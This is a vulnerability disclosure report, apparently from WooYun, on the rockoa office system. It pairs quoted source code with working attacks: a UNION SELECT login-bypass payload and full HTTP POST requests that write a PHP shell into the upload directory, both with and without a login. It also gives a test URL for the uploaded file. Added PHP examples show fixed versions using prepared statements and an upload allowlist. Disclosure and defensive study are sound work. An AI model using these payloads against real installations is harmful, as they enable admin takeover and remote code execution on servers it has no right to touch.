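Vulnerability summary

Bug ID: wooyun-2015-0158998

Title: SQL injection in the rockoa system (with preconditions)

Vendor: rockoa

Author: 路人甲

Submitted: 2015-12-08 10:14

Fixed: 2016-01-21 18:22

Disclosed: 2016-01-21 18:22

Vulnerability type: Design flaw / logic error

Severity: High

Self-assessed rank: 20

Status: The vendor could not be reached, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]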


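Vulnerability details

Disclosure status:

2015-12-08: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public
2016-01-21: The vendor has actively ignored the vulnerability; details are disclosed to the public

Brief description:

See title.

Detailed description:

0x01 Admin backend login bypass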
C:/phpStudy/WWW/rockoa/webrock/login/loginAction.php

public function checkAjax()
{
    $adminuser  = $this->post('adminuser');
    $adminpass  = $this->post('adminpass');
    $rempass    = $this->post('rempass');
    $jmpass     = $this->post('jmpass');
    $adminpass1 = $adminpass;
    if($jmpass == 'true')$adminpass=$this->jm->uncrypt($adminpass);
    $highpass   = HIGHPASS;
    $lglx       = '';
    $msg        = '';
    if($this->isempt($adminuser))$msg='帐号不能为空';
    $log        = m('log');
    if($msg==''){
        // $adminuser goes into the WHERE clause by string concatenation (the injection point)
        $us = $this->db->getone('[Q]admin', "`user`='$adminuser' and `status`=1 and `type`=1 and `state`<>5",'`pass`,`id`,`name`,`user`,`style`');
        if(!$us){
            $msg = '帐号不存在';
        }else{
            // the password is only compared with the `pass` column of whatever row came back
            $pass= $us['pass'];
            if(md5($adminpass)!=$pass)$msg='密码不对';
            // a global master password (HIGHPASS) overrides the per-user check
            if($adminpass==$highpass || $adminpass1 == $highpass){
                $msg='';
                $lglx = '超级密码';
            }
        }
    }

    if($msg==''){
        // session and cookies are populated from the returned row
        $adminid = $us['id'];
        $this->db->record('[Q]admin',"`loginci`=`loginci`+1,`lastdt`='$this->now',`lastip`='$this->ip'","`id`='$adminid'");
        $this->rock->savesession(array(
            QOM.'adminid'   => $us['id'],
            QOM.'adminname' => $us['name'],
            QOM.'adminuser' => $us['user'],
            QOM.'adminstyle'=> $us['style']
        ));

        $this->rock->savecookie(QOM.'ca_adminuser', $us['user']);
        $this->rock->savecookie(QOM.'ca_rempass', $rempass);
        $ca_adminpass = $this->jm->encrypt($adminpass);
        if($rempass=='0')$ca_adminpass='';
        $this->rock->savecookie(QOM.'ca_adminpass', $ca_adminpass);
        $this->rock->savecookie(QOM.'ca_adminstyle', $us['style']);
        $msg='success';
        $log->addlog('登录','['.$adminuser.']'.$lglx.'登录成功', array('optid'=>$us['id'], 'optname'=>$us['name']));
    }else{
        $log->addlog('登录','['.$adminuser.']'.$msg.'');
    }
    echo $msg;
}


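The login handler is injectable, but it still verifies the password once, so we use a UNION SELECT injection to bypass the check directly and get into the admin backend.
Set adminuser to:

asd' union select '202cb962ac59075b964b07152d234b70',1,'管理员','admin',1#


and adminpass to 123. The first column of the injected row is md5('123'), so the md5($adminpass) comparison against `pass` succeeds.
This gets you straight into the admin backend.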
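
The lookup in checkAjax() rewritten with a bound parameter, as an added example that is not rockoa's code: the table layout, function names and sample password are assumptions, and it runs against a constructed in-memory SQLite table. It also swaps the md5() comparison for password_hash()/password_verify() and has no HIGHPASS fallback.

```php
<?php
// Added example: not rockoa code. Table layout and names are assumptions
// modelled on the columns selected in checkAjax().
function findAdmin(PDO $db, string $user): ?array
{
    // The user name is bound as a parameter, so quotes, UNION and '#'
    // reach the database as data, never as SQL text.
    $st = $db->prepare(
        'SELECT pass, id, name, user, style FROM admin
          WHERE user = :u AND status = 1 AND type = 1 AND state <> 5'
    );
    $st->execute([':u' => $user]);
    $row = $st->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

function checkLogin(PDO $db, string $user, string $pass): bool
{
    $row = findAdmin($db, $user);
    // password_verify() checks a salted password_hash() value; there is no
    // shared master-password branch that overrides a failed comparison.
    return $row !== null && password_verify($pass, $row['pass']);
}

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE admin (id INTEGER PRIMARY KEY, user TEXT, pass TEXT,
           name TEXT, style INTEGER, status INTEGER, type INTEGER, state INTEGER)');
$ins = $db->prepare('INSERT INTO admin (user, pass, name, style, status, type, state)
                     VALUES (?, ?, ?, 1, 1, 1, 0)');
$ins->execute(['admin', password_hash('constructed-Passw0rd', PASSWORD_DEFAULT), 'Administrator']);

// The adminuser value from the report, now handled as a literal user name.
$payload = "asd' union select '202cb962ac59075b964b07152d234b70',1,'管理员','admin',1#";

var_dump(checkLogin($db, $payload, '123'));                  // injected user name
var_dump(checkLogin($db, 'admin', 'wrong'));                 // real user, wrong password
var_dump(checkLogin($db, 'admin', 'constructed-Passw0rd'));  // real user, correct password
```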

QQ20151206-0@2x.jpg


QQ20151206-1@2x.jpg


0x02 Getshell
Case 1: login required, then unrestricted getshell
C:/phpStudy/WWW/rockoa/mode/upload/uploadajax.php

if($action == 'send'){
    if(!$_POST)exit('Sorry!,send');
    $sendci     = (int)$rock->post('sendci')+1;
    $maxsend    = (int)$rock->post('maxsend');
    $maxwidth   = (int)$rock->post('maxwidth');
    $thumbtype  = (int)$rock->post('thumbtype');
    $sendcont   = $rock->post('sendcont');
    $savetype   = $rock->post('savetype','temp');
    $filename   = $rock->post('filename');
    $filetype   = $rock->post('filetype');
    $fileext    = trim($rock->post('fileext'));
    $filesize   = $rock->post('filesize');
    $filesizecn = $rock->post('filesizecn');
    $newfile    = $rock->post('newfile');
    $mkdir      = $rock->post('mkdir');
    $savepath   = $rock->post('savepath'); // alternate save path
    $thumbnail  = $rock->post('thumbnail');
}
$smkdir = '../../upload/'.$mkdir.'';
if(!file_exists($smkdir))mkdir($smkdir);
$allfile   = ''.$smkdir.'/'.$newfile.'';
$tempfile  = $allfile.'.temp';
$filepath  = substr($tempfile,3);
$thumbpath = ''; // thumbnail path
$width     = 0;
$height    = 0;
// the chunk is appended to <newfile>.temp before any session or extension check
$fc = fopen($tempfile, 'a');
fwrite($fc,$sendcont);
fclose($fc);
$id = 0;
if($sendci==$maxsend){

    $optid  = (int)$rock->session(QOM.'adminid',0);
    $imgext = '|jpg|gif|png|jpeg|bmp|';
    $boolc  = $rock->contain($imgext, '|'.$fileext.'|');
    $ztfile = $imgext.'doc|docx|xls|xlsx|ppt|pptx|pdf|swf|rar|zip|txt|gz|wav|mp3|wma|chm|';
    $botxtl = $rock->contain($ztfile,'|'.$fileext.'|');
    $boolc1 = $rock->isempt($savepath);
    // not logged in: a supplied savepath is ignored
    if(!$boolc1 && $optid==0)$boolc1 = true;
    $izztbo = false;
    if(!$boolc1 || $botxtl)$izztbo = true;
    if($izztbo){
        $content   = file_get_contents($tempfile);
        $temp1file = ''.$allfile.'.'.$fileext.'';
        $a64basec  = base64_decode($content);

        if(!$boolc1){
            // destination is built from client-supplied savepath and filename;
            // $fileext is not checked on this branch
            file_put_contents(ROOT_PATH.''.$savepath.''.iconv('utf-8','gb2312',$filename).'', $a64basec);
            unlink($tempfile);
        }else{
            file_put_contents($temp1file, $a64basec);
            unlink($tempfile);
            if($boolc){
                list($width, $height) = getimagesize($temp1file);
                if($rock->isempt($width)){
                    $width  = 0;
                    $height = 0;
                }
            }
        }
        $filepath = substr($temp1file,3);
    }
    $filepath  = str_replace('../','',$filepath);
    $thumbpath = $filepath;
    // (the excerpt ends here)


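This code first creates a temp file whose content is base64-encoded, then reads the content back from the temp file, base64-decodes it once, and writes the result to a file.

file_put_contents(ROOT_PATH.''.$savepath.''.iconv('utf-8','gb2312',$filename).'', $a64basec);


Both the savepath and filename variables are under our control, so this can be used to write a shell.
Before this branch is reached, two conditions must hold: the izztbo variable must be true and the boolc1 variable must be false.
For if(!$boolc1 || $botxtl)$izztbo = true; only one of the two operands has to be true, and since boolc1 comes from whether savepath is empty, we only need to give savepath a value. The request is then constructed like this: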

POST /rockoa/mode/upload/uploadajax.php?action=send&rnd=0.11527019962152985&p=webrock HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/rockoa/mode/upload/upload.php?callback=rock.up1449383669147_6905&upkey=20151206143456244282&p=webrock&title=%E5%9F%B9%E8%AE%AD%E6%96%87%E6%A1%A3&params1=%E5%9F%B9%E8%AE%AD%E6%96%87%E6%A1%A3&params2=141&opennew=true
Content-Length: 222
Cookie: rock_ca_adminuser=admin; rock_ca_rempass=0; rock_ca_adminstyle=1; PHPSESSID=gkuo4ai9bcbciioepdv7u84k17
X-Forwarded-For: **.**.**.**
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

sendcont=PD9waHAgcGhwaW5mbygpPz4=&filename=aax.php&maxsend=1&sendci=0&filetype=text%2Fphp&fileext=php&filesize=9145&filesizecn=8.93+KB&mkdir=2015-12&newfile=06_1435027893&savepath=/upload/&thumbnail=&maxwidth=0&thumbtype=0


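This creates a shell named aax.php under upload.
Case 2: no login required, but with restrictions
Without a login, $optid = (int)$rock->session(QOM.'adminid',0); yields an optid of 0, and the later check if(!$boolc1 && $optid==0)$boolc1 = true; forces boolc1 to true, so none of the subsequent branch can be entered and only a tempfile can be written. Because $tempfile = $allfile.'.temp';, this can only be used together with an Apache or IIS parsing vulnerability. Construct the request directly: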

POST /rockoa/mode/upload/uploadajax.php?action=send&rnd=0.11527019962152985&p=webrock HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/rockoa/mode/upload/upload.php?callback=rock.up1449383669147_6905&upkey=20151206143456244282&p=webrock&title=%E5%9F%B9%E8%AE%AD%E6%96%87%E6%A1%A3&params1=%E5%9F%B9%E8%AE%AD%E6%96%87%E6%A1%A3&params2=141&opennew=true
Content-Length: 211
X-Forwarded-For: **.**.**.**
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

sendcont=<?php phpinfo()?>&filename=aax.php&maxsend=1&sendci=0&filetype=text%2Fphp&fileext=php&filesize=9145&filesizecn=8.93+KB&mkdir=2015-12&newfile=test.php&savepath1=/upload/&thumbnail=&maxwidth=0&thumbtype=0


The response is:

{success:true, msg:"246",filepath:"upload/2015-12/test.php.temp", sendci:1, thumbpath:"upload/2015-12/test.php.temp",width:0,height:0}


I tested one at random:

http://**.**.**.**/upload/2015-12/test.php.php
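
A hardened version of the write path that both getshell cases above go through, as an added example that is not rockoa's code: the function name, allowlist and directory layout are assumptions. It authenticates before writing anything, enforces the extension allowlist unconditionally, and builds the destination only from server-chosen values.

```php
<?php
// Added example: not rockoa code. The allowlist, directory layout and
// function name are assumptions chosen for illustration.
const ALLOWED_EXT = ['jpg', 'gif', 'png', 'jpeg', 'bmp', 'doc', 'docx', 'xls',
                     'xlsx', 'ppt', 'pptx', 'pdf', 'rar', 'zip', 'txt'];

function storeUpload(string $root, int $adminId, string $clientExt, string $b64): string
{
    // 1. Authenticate before any byte is written, temp chunks included.
    if ($adminId <= 0) {
        throw new RuntimeException('login required');
    }
    // 2. The extension must be on the allowlist; no branch skips this
    //    check when a save path is supplied.
    $ext = strtolower($clientExt);
    if (!in_array($ext, ALLOWED_EXT, true)) {
        throw new RuntimeException('extension not allowed');
    }
    // 3. Strict base64 decoding; malformed input is rejected.
    $data = base64_decode($b64, true);
    if ($data === false) {
        throw new RuntimeException('invalid base64');
    }
    // 4. Directory and file name are chosen by the server. Nothing like
    //    savepath, mkdir, newfile or filename from the request reaches the path.
    $dir = $root . '/' . date('Y-m');
    if (!is_dir($dir) && !mkdir($dir, 0750, true)) {
        throw new RuntimeException('cannot create directory');
    }
    $path = $dir . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (file_put_contents($path, $data, LOCK_EX) === false) {
        throw new RuntimeException('write failed');
    }
    return $path;
}

// Constructed requests: [admin id from session, fileext, sendcont].
$root  = sys_get_temp_dir() . '/upload_demo_' . bin2hex(random_bytes(4));
$cases = [[1, 'php', 'PD9waHAgcGhwaW5mbygpPz4='], [0, 'txt', 'aGVsbG8='], [1, 'txt', 'aGVsbG8=']];
foreach ($cases as [$id, $ext, $body]) {
    try {
        echo 'stored: ', storeUpload($root, $id, $ext, $body), PHP_EOL;
    } catch (RuntimeException $e) {
        echo 'rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```

Keeping the upload directory outside the web root, or serving it with script execution disabled, means a stray .temp or double-extension file is never interpreted by the server.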


Proof of vulnerability:

QQ20151206-0@2x.jpg


QQ20151206-1@2x.jpg


QQ20151207-0@2x.jpg

QQ20151207-1@2x.jpg


Cases

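Fix:

You're the professionals.

Copyright notice: when reposting, please credit the source 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

The vendor could not be reached, or the vendor actively declined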
